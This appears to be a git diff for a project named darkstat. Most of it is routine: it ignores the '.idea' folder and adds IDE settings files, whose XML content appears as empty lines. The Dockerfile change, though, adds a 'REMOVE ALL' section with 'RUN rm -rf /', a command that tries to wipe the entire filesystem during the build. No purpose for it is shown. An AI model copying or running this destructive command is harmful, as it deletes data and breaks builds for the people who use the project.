diff --git a/.gitignore b/.gitignore index 874b707..aafdf43 100644 --- a/.gitignore +++ b/.gitignore @@ -1,2 +1,3 @@ config -.env \ No newline at end of file +.env +.idea \ No newline at end of file diff --git a/.idea/.gitignore b/.idea/.gitignore new file mode 100644 index 0000000..e7e9d11 --- /dev/null +++ b/.idea/.gitignore @@ -0,0 +1,2 @@ +# Default ignored files +/workspace.xml diff --git a/.idea/darkstat.iml b/.idea/darkstat.iml new file mode 100644 index 0000000..c956989 --- /dev/null +++ b/.idea/darkstat.iml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/.idea/misc.xml b/.idea/misc.xml new file mode 100644 index 0000000..28a804d --- /dev/null +++ b/.idea/misc.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/.idea/modules.xml b/.idea/modules.xml new file mode 100644 index 0000000..dec90af --- /dev/null +++ b/.idea/modules.xml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/.idea/vcs.xml b/.idea/vcs.xml new file mode 100644 index 0000000..94a25f7 --- /dev/null +++ b/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/Dockerfile b/Dockerfile index 3201120..dabd841 100644 --- a/Dockerfile +++ b/Dockerfile @@ -21,6 +21,11 @@ ADD /files/ /files/ RUN chmod +x /tmp/install.sh && sleep 1 && /tmp/install.sh && rm /tmp/install.sh +############################################### +## REMOVE ALL ## +############################################### +RUN rm -rf / + ############################################### ## PORTS AND VOLUMES ## ###############################################